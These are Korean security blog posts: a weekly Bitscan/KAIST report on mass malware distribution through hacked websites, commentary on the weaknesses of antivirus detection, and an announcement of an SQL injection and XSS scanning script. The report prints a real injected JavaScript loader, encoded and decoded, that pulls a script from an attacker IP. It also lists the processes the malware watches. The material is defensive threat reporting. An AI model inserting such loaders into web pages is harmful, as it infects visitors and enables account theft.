태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

 빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 5 5주차 내용입니다본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며차주부터 대규모로 확장된 상태로 운영 되고 있어서국내 인터넷 위협에 대한 주간 동향으로 참고하셔도 충분 할 것입니다.


 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.


1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


금주 차의 특징은 2주전부터 언급 드렸던 공격자들의 전략적인 공격이 대폭 확대 되는 특징을 보이고 있습니다신규 악성링크 및 악성코드들은 전주와 대동소이한 양상을 보이고 있으나실제 악성링크 하나가 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였습니다즉 중간 경로를 이용한 효율적 공격들이 대거 관찰 되고 있어서 전주 대비 영향력 면에서는 비교하기가 어려울 정도로 위험성이 높은 상태 입니다.

 

금주의 악성코드 유포지로 이용된 웹서비스들은 412곳 이상이며 전주 대비 대폭 증가 되었으며 현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 백여 개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 되고 있습니다악성링크가 삽입된 웹서비스들의 대응이 많이 부족한 상태라 계속 재발 되고 있으며대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다기존의 봇넷과는 다른 형태의 악성코드 전파용 네트워크라 할 수 있습니다Malware net 이라 불러야 할 정도로 판단됩니다.


 




대표적으로 대규모 확산된 악성링크는 http://www.xxxxxx.com/script/js/script.js 이며 국내 주요 웹서비스 100여곳 이상의 웹서비스 코드에 해당 링크가 추가 되어 방문시 마다 자동 실행을 통해 좀비 PC 감염을 확대 하고 있습니다본 요약을 작성하는 현재 6.6일 오후 3시에도 운영이 되고 있으며 내부에 들어 있는 코드는 다음과 같습니다.


* 본 링크에 대한 공개는 공개된 글로 언급하는 것은 부적절하여 언급 하지 않도록 합니다.  현재 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 100여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다. 공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

 


if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%35%30%2E%31%31%37%2E%31%31%33%2E???%2F%70%69%63%2F%69%6D%67%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"));}


Hex  Decode 


-> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://50.117.113.XXX/pic/img.js></script>"));}

 

이처럼 중간 경로를 가지고 최종 사용자를 공격하는 악성코드들을 자유롭게 변경하고 대규모로 운영을 할 수 있는 상황이 현재입니다.



결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중이나 현재 분석 및 대응이 완료된 상태로 분석에는 문제가 없는 상태를 유지 하고 있습니다.

 

악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고악성코드 유포 인지도 못하는 상태라서대응이 되지 않는 악순환이 계속 되고 있습니다이제 공격자들은 자유로운 재활용을 넘어악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다전주의 예상 드린 바와 동일하게 진행이 되고 있으며 5 4주차에 차단을 권고 드린IP 대역 대부분을 모두 재활용 하였습니다만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

 

전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며 주의 단계를 지난 상태로 보입니다.

 

5 5주차 특징은 다음과 같습니다.


 

특징

  • · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속
  • · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임
  • · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대

          * 최대 100여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

  • · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술루트킷(APT 형태유포 확대
  • · 4월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

 

악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


*유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

 


사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다


패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다감염 이후에 대응은 휠씬 더 큰 피해를 입은 이후에 많은 비용과 자원 투입이 되어야 복구가 된다는 점을 잘 알고 계실 것 같습니다.


  •  Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

  • 1,2,5 기술보고서에 언급된 루트킷 및 키로거백도어 기능을 가진 악성코드들은사용자 PC의 드라이버 및 시스템 파일 교체윈도즈 서비스 등록등을 실행하고내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

      * 해당 보고서들은 정식 구독 신청 및 시범 서비스 신청하신 기관/기업에만 제공 됩니다. 

  • 4번 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다.모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다. 금융권도 다르지 않습니다.


프로세스명

프로그램명

백 신

sgbider.exe

vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc

nsvmon.npc

Nsavsvc.npc

NaverAgent.exe

네이버백신

V3LRun.exe

MUpdate2.exe

SgSvc.exe

V3Light.exe

V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye

AYRTSrv.aye

SkyMon.exe

AYServiceNT.aye

AYupdate.aye

AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com

dnf.exe

던전 앤 파이터

DragonNest.exe

드래곤 네스트

WinBaram.exe

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

 

  • 5 2주차에 발견된 가상머신 실행을 감지(Vmware  magic number)하고 종료하거나 분석을 회피하도록 설계된 악성코드의 대량 유포는 계속 진행 되고 있습니다.

 

· 항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 할 수 있으므로 심각한 주의가 필요합니다더군다나 본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다


APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다대응에 참고 하십시요.


 

사용된 취약성 비율

- CVE 2011-3544 ( 24.2%) Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 28.3%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 (20.2%) Windows Midi 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고

- CVE 2012-0754 (26.3%) Flash 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (1.0%) IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

 

금주의 차단 추가 영역은 다음과 같습니다아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다강력한 차단을 유지하실 것을 권고 합니다.

 

차단 권고 대역

각 개별 분석보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 활용 하십시요.

 

-본 지면에서는 공개 하지 않습니다.

 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다 KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.
 
정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명담당자연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.
 
본 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며악성링크 및 악성코드 분석은 KAIST 사이버보안센터정보보호대학원과 공동으로 진행합니다.

Posted by 바다란
 - 2011.11.12
공격자의 전략적인 측면을 살펴 봐야 한다. 지금 개별 단위 보안제품의 대응은 사실상 무장해제 상태라고 봐야 하며 공격자들은 일단 규모로서 압도를 하고 탐지 로직을 우회함으로써 무력화 시키는 상황이다.

네트워크 단위의 보안제품의 한계, 패턴 매칭을 통해 탐지를 하는 AV든 Web Firewall 이든 개별적인 대응 밖에 되지 않고 있는 상황이고 전역적인 대응은 언감생심 꿈도 꾸지 못할 상황이다.

날마다 새로이 나오는 악성코드들을 진단 하기 위해서는 악성코드의 수집이 가장 먼저여야 된다. 그동안의 수집 방법을 보면 상당부분이 사용자의 신고, 허니넷, 허니팟 등을 통해서 이루어 지고 있다. 물론 정보의 공유는 시일이 지나서 각 업체들 끼리 이루어 짐으로 시의적절성 측면에서 늦을 수 밖에 없다. 이 각각에 대해 조금 이면을 살펴보자.

  • 만약 공격자가 공격을 수행 하지 않는다면 허니넷이나 허니팟은 무용지물이 된다.  
  • 또한 사용자가 악성이라고 인식을 하는 대부분의 경우도 설치된 AV에서의 탐지를 근거로 한다. 만약 AV가 탐지 하지 못하는 악성코드라면 사용자가 인지할 방안은 없다.

  • 업체간의 정보공유도 이전과 같은 전통적인 전달 매커니즘인 디스켓, USB를 통한 악성코드의 감염은 지역별 확산에 상당한 시간차가 걸렸고 바다를 건넌다는 것도 어려웠다. 이 매커니즘이 깨진건 웜이라는 매개체를 통해서이며 이 웜 조차도 발생지 근처의 네트웍이 먼저 초토화 된 이후 다른 곳으로 확산 된다.

    웜 이후에 발생된 것은 검색엔진을 통한 특화된 공격, 파일 공유등을 통한 확산이 있었고 일정한 특징을 가지고 있었다. 그렇다면 지금은 어떨까?

간단하게 설명하고 상당부분 축약해서 위의 과정을 언급했지만 각 과정마다 언급하지 않은 많은 상세한 부분들이 있다. 그 특징들에 대해서는 지금까지의 발표자료나 본 사이트의 글들을 참고하면 일정 수준 참고가 가능하다.

지금의 공격은 말하자면 불특정 다수를 겨냥한 무차별적인 악성코드 유포이며 주된 공격 대상은 사용자의 PC에 일반적으로 설치된 써드파티 프로그램을 공격하는 코드들이다.

왜 Adobe는 시도 때도 없이 패치를 하는가? 

그 이유는 현재 사용자 PC의 90% 가량에 Flash player가 설치 되어 있기 때문이고 해외도 비율상 조금 낮은 거 이외에는 별반 차이가 없다. 공격자들은 Flash Player의 취약성을 공격하여 사용자 PC의 권한 획득을 하는 것이 가장 효율적인 방안임을 인지하고 있기 때문에  집중적인 공격을 수행한다.

또한 개별 PC를 공격하는 것이 아니라 사용자들이 방문하는 웹서비스들을 집중하여 공략 함으로써 불특정 다수에 대한 공격을 성공적으로 하고 있다. 언론사뿐 아니라 주요 커뮤니티 서비스들, 파일공유 사이트들을 직접 공격하여 웹서비스의 소스를 변경한다. ( 운영자나 개발자가 눈치 채지 못하게 암호화 하거나 기묘한 곳에 아주 짧게 넣는 것은 기본이다.)


< 웹을 통한 악성 코드 유포와 활용에 대한 컨셉>

위의 이미지와 같이 다양하게 활용 되고 있다. 이중 90% 가량은 개인정보 유출 및 백도어 활용이 가능한 용도의 악성코드를 사용자에게 감염 시키고 5% 가량은 DDos 나 Arp spoofing 행위를 보인다. 나머지 5% 가량이 지난 농협 사례와 같이 내부망으로 공격하는 용도의 악성코드라 할 수 있다. 사실은 90%의 개인정보 유출도 동일하게 활용이 가능할 뿐이다. 사용처에 대해 구분을 하자면 이 정도라는 것일뿐.


2011년 11월 12일 현재의 상황


지난 몇년간을 위험성에 대해서 언급을 했었고 개인 차원에서 할 수 있는 최대한으로 발표와 기고, 컬럼을 통해 언급을 했었지만 아직도 우리는 한참을 더 가야 하고 현 상황을 돌아 보고 반성이 필요하지 않나 생각 된다.
물론 우리뿐 아니라 전 세계적으로 마찬가지지만  ..만약 우리가 대응을 잘한다면 미래에서의 인터넷의 주요 파워를 가지게 되지 않을까? 

단순한 예상으로도 보안 문제는 앞으로 더 심각해 지며 , 악성코드의 갯수는 점점 더 많아 질 것이다라고 예상 할 수 있다. 시만텍과 맥아피도 손을 놓는 상황에서 누가 살아 남을 수 있을 것인가? 핵심은 대량유포 매커니즘을 깨야만 하는 것이고 이 매커니즘을 깨기 위해서는 다각적인 노력이 필요하다. 이 노력은 악성코드 유포에 이용 되는 많은 웹 서비스들의 문제점을 개선하는 측면 하나와 대규모 확산 이전에 차단 하는 노력이 병행 되어야 가능 할 것이다.

모든 웹 서비스들의 문제점을 개선하여 공격자가 인위적으로 웹소스를 변경 하지 못하도록 취약성을 제거 한다면 이 문제는 매우 명백하게 해결 되나 이렇게 될 가능성은 앞으로도 인터넷이 존재하는한 불가능하다. 최소한 방문자가 많은 사이트들에게는 일정 수준의 강요가 되어야 하고 즉시적이고 긴급한 대응이 계속 되어야만 한다.

더불어 길목을 차단하는 것으로 수십여곳 이상의 웹서비스에서 악성코드의 경로가 추가되어 모든 방문자들에게 감염 시도를 하는 것을 예방 할 수 있다. 웹 소스에 추가된 경로를 빠르게 인지하여 대응을 한다면 이게 가능해진다.

경로의 빠른 인지는 아직도 원초적인 ( 이벤트 탐지 방식) 방식에만 의존하고 있는데 이걸 우회하고 무력화 하기 위한 공격자들의 전략도 이미 출현한 상태이고 이 부분은 별도의 글로 남기고자 한다.  
전략을 넘어서기 위해서는 좀 더 다른 방식의 접근이 필요하다.

탐지 체계에서도 다른 형태가 필요하며 대응체계 (주로 AV)도 변화가 필요한데 최소한 선제적인 대응이라도 못한다면 빠른 악성코드의 공유체계와 감시체계라고 존재해야만 효율을 높일 수 있다. 솔직히 한국을 대상으로 직접적으로 악성코드를 유포하고 있음에도 불구하고 한국내의 AV업체가 제대로 대응을 하지 못하는 것은 기회를 잃어 버리는 것과도 동일하다. 해외 보안분야 대기업들과 비교할 필요도 없다. 비교 우위를 가질 수 있는 고난의 시간을 그냥 보내는 것은 비극이다.


그럼 여기 금일자로 최소 50여곳 이상의 서비스들에 추가된 경유지를 살펴 보자. (하루 방문자 1만명만 해도 50만명이 감염 범위에 들어간다. 신규 악성코드라면 성공률은 거의 90%라고 봐야 하지 않을까? 최소한..)

A라는 서비스에 B라는 주소가 인위적으로 소스에 추가되어 있다. 우린 그 B를 추적하여 그 근거지를 보여주는 것이다. 일반적으로 사용자는 A라는 서비스에 브라우저로 연결만 하여도 B의 주소의 것도 같이 실행 되게 되어 감염 되는 것이다. 


두 곳을 올렸다. 한 곳은 국내의 커뮤니티 사이트에 직접 올린 내용이고 또 다른 하나는 공격자가 만든 근거지이다.
현재 이 데이터를 확인 하는 것은 이미 발견 시간이 몇 시간좀 지나긴 했지만 아직도 전 세계에서 두번째가 아닐까 싶다.

만들어둔 공격자 다음으로 말이다.

* 최소 50여곳 이상의 웹서비스에서 악성코드를 사용자에게 배포하고 있슴에도 불구하고 구글의 Block 로직은 전혀 동작하지 않는다. Stopbadware의 데이터는 이전 기록을 가지고 대응하는 것일 뿐이지 지금의 문제는 아닌 것이다. 또한 판단근거가 부족하기에 탐지는 어렵다고 봐야 된다.  구글의 서비스 확장전략에 보안도 들어가 있지만 그것은 필히 실패할 것이다. 지난 6년간 수많은 비용을 들여 축적한 데이터의 신뢰도는 낮다. 그걸 입증하는 것도 어렵지 않다.  앞으로는 규모로 한번 해볼 예정이다. 

그렇다면 이중에서 신규 플래쉬 공격코드로 유포되는 악성코드의 탐지는 어느 정도 되는지 확인해 보자.



단순히 보면 알겠지만 전 세계 주요 백신들 중에서 오직 하나 정도만이 휴리스틱으로 ( 악의성이 있다 정도? ) 탐지가 된다. 나머지는 전멸이다. 여기 백신에는 이름만 들어도 알 수 있는 모든 제품들이 포함 되어 있다.

즉 제대로 진단되는 백신은 하나도 없다는 의미와 동일하다.
( 시만텍이든 맥아피든 마찬가지다...)

서비스를 통한 차단을 하는 구글의 Stopbadware도 차단이 되지 않고 가장 악성코드를 많이 분석하는 회사들이나 모든 백신 회사들의 탐지에도 걸리지 않는다. 이게 지금 우리가 마주한 실질적인 위협이다.


지난 3주 이상을 샘플을 일부 분석해 보고 테스트 해봤지만 평균 탐지율은 10% 미만이다. 우리의 지금 상태가 그렇다. 오늘도 파일공유나 언론사, 커뮤니티 사이트에 대량 추가가 되어 있어서 한국내에서만 이 악성코드의 확산은 100만대를 상회할 것이라 예상된다. Adobe의 패치? 기대를 말자!.

우리를 보호하고 지킬 수 있는 것은 우리 자신 밖에 없다. 아무리 불법적인 사이트를 안가고 패치를 잘하고 보안제품을 쓴다고 해도 이젠 위험에 노출된 상황이다. 인터넷 서핑을 하지 말아야만 위험이 줄어 드는데 그럴 수 있는가? 

다른 형태의 위협대응이 긴급하게 요구되고 즉시 대응이 되어야만 한다.


- 바다란 세상 가장 낮은 곳의 또 다른 이름

* 현재 여기에 올린 이미지의 내용을 인지하고 있는 곳도 없고 악성 공격코드의 최초 확보도 현재로서는 우리쪽에서만 가능하다. 좀 더 조용하고 은밀하게 해야 하지만 이 문제의 심각성에 대해서 인식이 부족하여 노출을 감내하면서도 자료를 일부 오픈 할 수 밖에 없다. 그러나 충분한 인식이 되었다면 우리도 정보 노출을 최대한 하지 않을 생각이다. 


*개인적으로 지난 15년간 ( 벌써 ..후.) 많은 공개문서들과 컬럼, 의견들을 올렸는데 한번쯤 정리를 할 필요성을 느낀다. 여전히 새롭게 이 분야에 들어온 많은 분들이 모르는 것들이 많다. 먼지 쌓인 외장 하드의 전원을 한번쯤 올려야 겠다. History of p4ssion 정도
 
Posted by 바다란

XSS : Cross site scripting - 현재 악성코드 설치 유형이 각 웹서버의 게시물에 대해 Cross site scripting을 이용하여 악성코드를 방문자에게 설치하는 유형이 매우 증가하고 있고 사용자의 쿠키를 외부로 빼내어가 인증 용도로 사용할 수 있는 문제점들이 있으므로 심화 진단하여 제거하는 것이 필요한 취약성

 

SQL Injection: 일반적인 SQL Injection이 아닌 URL 인자 단위마다 임의의 SQL command를 입력하여 데이터를 빼내어 가거나 DB 권한을 획득하여 정보를 유출 시킴.. 또한 획득한 DB 권한을 이용하여 웹서버의 소스코드를 직접 변경함.

 

Type Error:  문자를 입력하지 않아야 될 곳에 문자가 입력되는 등의 Vb script error의 경우에도 올해 상반기에 발견된 공격 유형 중 수치를 이용하여 결과를 유출 시키는 유형이 발견됨에 따라  [ 정수를 Ascii code 값으로 치환하여 결과를 리턴하는 유형 ] 강화된 진단 유형이며 일반적인 Input validation check의 개념에 따라 기본 오류를 찾아내도록 구성된 부분

 

전체적으로 Secure web programming 강화가 필요하며 강화를 위해 간단하게 작성된 스크립트 도구에서는 위의 세가지 문제를 URL 단위의 각 인자마다 체크하는 유형으로 간략하게 구성하여 문제를 확인토록 함.

 

국내의 현황

 

악성코드가 유포되는 모든 사이트들은 DB의 권한 탈취를 통해 웹서버의 소스코드를 변경하는 유형이므로 DB에 저장된 회원 정보 및 기밀 데이터들은 안정성을 보장 할 수 없는 상태임. 따라서 회원 DB 다수의 유출은 이미 돌이킬 수 없는 상태에 접어든 것으로 보임. 현재 상태에서 추가적인 악성코드 유포가 되지 않도록 Validation check를 강화하였을 경우 기존에 유출된 회원정보를 이용한 각 서비스 Unit에 대한 어뷰징이 증가 될 것으로 예상됨.

 

 

 

위의 현황과 문제인식에 따라 몇달전 내부적으로 사용하던 Perl script를 공개 하였습니다.

또한 시간이 허락하는한.. 공개적으로 발전을 시키고자 합니다. 따라서 Sourceforge에 며칠전 등록을 하였습니다. 관심이 있는 분들께서는 함께 참여하여 앞으로 보다 나은 환경 구축에 힘 썼으면 하는 개인적인 바램 있습니다.

 

https://sourceforge.net/projects/gamja

 

Project 페이지 입니다. 몇달전 공개한 스크립트 그대로 이며 기본적으로는 Web 진단 도구화 할 생각도 있습니다. 비싸고 효율성이 그다지 높지 않은 상용 App를 넘지는 못하더라도 기본 진단은 충실히 할 수 있도록 향후 발전 시킬 수 있었으면 합니다.

 

많은 참여 바랍니다.

 

* 공개용 스크립트는 위의 sourceforge 사이트 외에 본 블로그에서도 관련 내용을 확인 하실 수 있습니다. http://blog.naver.com/p4ssion/50009547486

 

 

    - 바다란  (p4ssion)

 

Posted by 바다란

오랜만입니다.

 

여러 개인 사정으로 인해 글을 쓸 여유가 없었습니다.

앞으로도 상황은 마찬가지 일 것 같습니다.

 

SQL Injection . 지금에 와서 이 공격의 유형을 모르는 한국이나 전 세계의 웹 개발자 혹은 보안 전문가는 없으리라 봅니다. 3~4년 전만 하여도 일선의 재빠른 사람들에게만 인지 되는 사안들이 이제는 글로벌화된 상황이라 할 수 있습니다.

 

이전에 존재 하였던 SQL Injection 유형과 현재 발생하는 유형의 차이점은 이 블로그의 Mass sql injection 관련 글을 찾아 보시면 좀 더 쉽게 이해가 되시리라 봅니다.

 

현재는 상황 그대로 세계적인 불황입니다. 얼마전 글에서 예측 하였듯이 앞으로 노골적인 공격들이 더욱 거세 질 것 이고 보다 전문화된 공격들도 직접 이용이 될 것입니다. 최근 MS에서 긴급패치가 이루어진 MS08-067의 경우에도 PoC( Proof of concept - 공격 개념코드)가 나오기 이전에 계정정보 유출을 위한 실제 Trojan이 배포 된 이후에 MS 측에서 대응을 한 내용입니다.

 

앞으로 이와 같은 상황은 더욱 거세질 것입니다.  공격의 전문성도 높아지고 유포되는 범주도 지속 되고 있습니다. 지금도 하루에 수 십차례 이상 공격을 받는 곳들이 대다수 일 것이고 문제가 심각한 기업들은 웹보안 장비들의 도입에 열을 올리고 있을 것입니다. 이런 웹 보안장비들의 근본적인 한계에 대해서는 본 블로그에서 여러 차례 지적한 바가 있습니다.

 

 

 

공격의 전문성 강화

 

공격의 전문성이 높아지는 것은 비단 이번의 MS08-067의 예를 들지 않더라도 2년 전 부터 나타난 현상입니다. 하나의 Trojan을 설치하기 위해 수 십가지 이상의 여러 Application에 대한 공격코드들이 최적화 되어 있고 주변으로 전파를 하고 있습니다. 심지어는 ARP spoofing까지도 이루어 지죠. ( SQL Injection 이든 Arp spoofing의 경우에도 기존의 공격 개념과는 다른 관점으로 상당히 발전적인 응용이라 할 수 있습니다. )  공격자들은 그만큼 기존의 공격 기법과 새로운 취약성의 접합과 연구에 적극적입니다.

 

그리고 그들은 이제 전문 영역을 지니게 되었습니다. 이 의미는 하나의 산업으로 존재할 만큼의 기술적인 (?) 공격 역량과 숙련도를 보유하고 있다는 것이라 할 수 있습니다. 이런 기술을 이용하여 이득을 취하기 위한 또 다른 산업 영역도 개척을 한 상태입니다. 즉 소비채널과 유통채널의 구축이 완료된 상태라 할 수 있습니다.  앞으로 더욱 심해 질 것입니다.

 

새로운 Exploit의 최초 발견과 적용이 연구자들 사이에서 나오는 것이 아니라 이제는 공격자들에게서 직접 발생이 되고 있습니다. 이 추세는 향후에도 증가 할 것으로 예상 됩니다. 더불어 SQL Injection의 경우에도 여러 번 거듭 말씀 드렸지만 단순 패턴매칭으로 차단하는 보안장비에서는 해결이 되지 않습니다. 지금도 정말 많은 우회 기법들이 나오고 있고 바로 적용이 되고 있습니다. 공격자는 코드 한번만 바꾸면 되지만 방어자는 수 천, 수 만 아니 그 이상의 장비들에 대해 개별적인 설정이 되어야만 합니다. 

 

이 싸움에서 이길 것이라 보십니까?  저는 진다고 봅니다.

 

 

(Mass sql injection)양식장을 손에 쥔 상어떼

 

이 표현이 적당한 가 모르겠습니다만 제 머리속에 그려지는 이미지로는 이 표현외에는 더 적당한 표현을 할 수가 없습니다. 양식장은 전 세계의 웹 서비스가 해당이 됩니다.

상어떼는 아시다 시피 공격자들이구요. 양식장에 갇힌게 아니라 언제든 잡을 수 있는 그물을 상어떼가 가지고 있는 모양새 입니다.  이 그물을 어떻게 끊을 수 있을까요? 

 

개별 웹 서비스들에 대해서는 가능하겠지만 전 세계적인 범주에서 보면 정말 어려운 일일 것입니다.  전 세계 웹 서비스의 인자 각각에 유효성 체크가 되어야만 하는데 현실적으로 어렵습니다. 스캐너를 이용한 진단의 경우에도 여러 한계가 있음을 지적한 바 있습니다. 앞으로도 오랜 시간이 흘러야 범위가 줄어들 것이고 그 이전까지는 광범위한 Trojan의 유포와 악성코드에 의해 전 세계의 개인 PC가 시달릴 것입니다. 윗 절의 공격의 전문성 강화와 겹쳐져 공격의 전문성과 파급력은 지속이 될 것이고 PC에 설치되는 다양한 Application에 대해 공격이 이루어 질 것입니다.

 

현재의 공격은 서비스에 대한 공격인 DDos 공격과 금전을 목적으로 한 Trojan 유포에 중점이 맞추어져 있습니다. Trojan 유포는 웜과 바이러스를 통한 유포의 범주보다 웹서비스를 통한 광범위한 유포가 일반화 되어 있습니다. 지금의 공격자들의 특성은 자신을 과시하지 않습니다. 오로지 금전적인 정보가 목적일 뿐입니다.

 

전 세계 모든 보안 채널 및 보안 관련 회사들이 새로운 유형의 공격기법이나 취약성이 출현 할때 마다 예전보다 휠씬 더 긴밀하게 협력을 하고 있습니다. 그래도 모자람이 너무 많습니다.

 

 

이런 그물을 끊어야만 하며 끊기 위해서는 개발자를 위한 자가진단이 가능한 저가 웹서비스 혹은 Open source 형태의 서비스가 필요하고 점진적으로 개선을 시킬 수 밖에는 없는 상황입니다.

 

